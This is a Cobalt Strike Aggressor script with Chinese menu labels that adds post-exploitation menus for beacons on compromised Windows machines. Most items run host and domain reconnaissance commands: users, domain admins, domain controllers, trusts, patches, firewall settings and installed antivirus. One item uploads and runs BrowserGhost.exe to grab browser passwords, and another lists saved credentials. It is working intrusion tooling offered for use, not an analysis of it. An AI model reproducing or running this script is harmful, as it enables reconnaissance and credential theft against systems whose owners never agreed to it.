menu "信息收集" {
    menu "Windows信息搜集" {
        item "获取本机⽹络配置信息"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"ipconfig /all"));
        }
        item "查询操作系统和版本信息"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],'systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"'));   
        }

        
        item "查看安装程序和版本信息" {
            $bid = $1['@'];
            bshell($bid, "wmic product get name,version");
        }

        item "查看最近打开的文档" {
            $bid = $1['@'];
            bshell($bid, "dir %APPDATA%\Microsoft\Windows\Recent");
        }


        


        item "查看系统体系结构"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"echo %PROCESSOR_ARCHITECTURE%"));   
        }
        item "查看安装的软件及版本/路径"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"wmic product get name,version"));   
        }
        item "查询本机服务信息"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"wmic service list brief"));   
        }
        item "查询进程列表"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"tasklist"));
        }
        item "查看启动程序信息"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"wmic startup get command,caption"));
        }
        item "查看计划任务"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"schtasks /query /fo LIST /v"));
        }
        item "查看主机开机时间"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"net statistics workstation"));
        }
        item "查看⽤户"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"net user"));
        }
        item "查看当前在线⽤户"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"query user || qwinsta"));
        }
        item "查看本机端⼝开放情况"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"netstat -ano"));
        }
        item "查询补丁信息"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"systeminfo | findstr KB"));
        }
        item "查询路由表及所有可⽤接⼝的ARP缓冲表"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"route print"));
        }
        item "查看防火墙配置"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"netsh firewall show config"));
        }

        item "查看安装那些杀毒软件"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe"));  
        }

      
       item "抓浏览器密码" {
           
       

            bupload($1, script_resource("/script/BrowserGhost.exe"));

            bmv($1, "BrowserGhost.exe", "C:\\Users\\Administrator\\Desktop\\BrowserGhost.exe");

            bshell($1,"C:\\Users\\Administrator\\Desktop\\BrowserGhost.exe");

        }    






        item "查询并开启远程桌⾯连接服务"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],'REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp" /V PortNumber'));
        }
    }
    




    menu "域内信息搜集" {
        item "获取域SID"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"whoami /all"));
        }
        item "查询域内⽤户"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"net user /domain"));
        }
        item "查看域⽤户的详细信息"{
            prompt_text("指定一个域用户:", "", lambda({
                bshell(@ids, "net user $1 /domain");
            }, @ids => $1));
        }
        item "查询域列表"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"net view /domain"));
        }
        item "查询域管理员列表"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],'net group "domain admins" /domain'));
        }
        item "查看域内时间"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"net time /domain"));
        }
        item "查看登陆本机的域管理员"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"net localgroup administrators /domain"));
        }
        item "查看域内所有⽤户组列表"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"net group /domain"));
        }
        item "查看主域控制器"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"netdom query pdc"));
        }
        item "查看所有域控制器列表"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],'net group "Domain Controllers" /domain'));
        }
        item "查询域信任信息"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"nltest /domain_trusts"));
        }
        
        item "查看当前保存的登陆凭证" {
            $bid = $1['@'];
            bshell($bid, "cmdkey /l");
        }









        item "查询域密码信息"{
            binput(beacon_ids()[0],bshell(beacon_ids()[0],"net accounts /domain"));
        }
    }




    





        

    }






















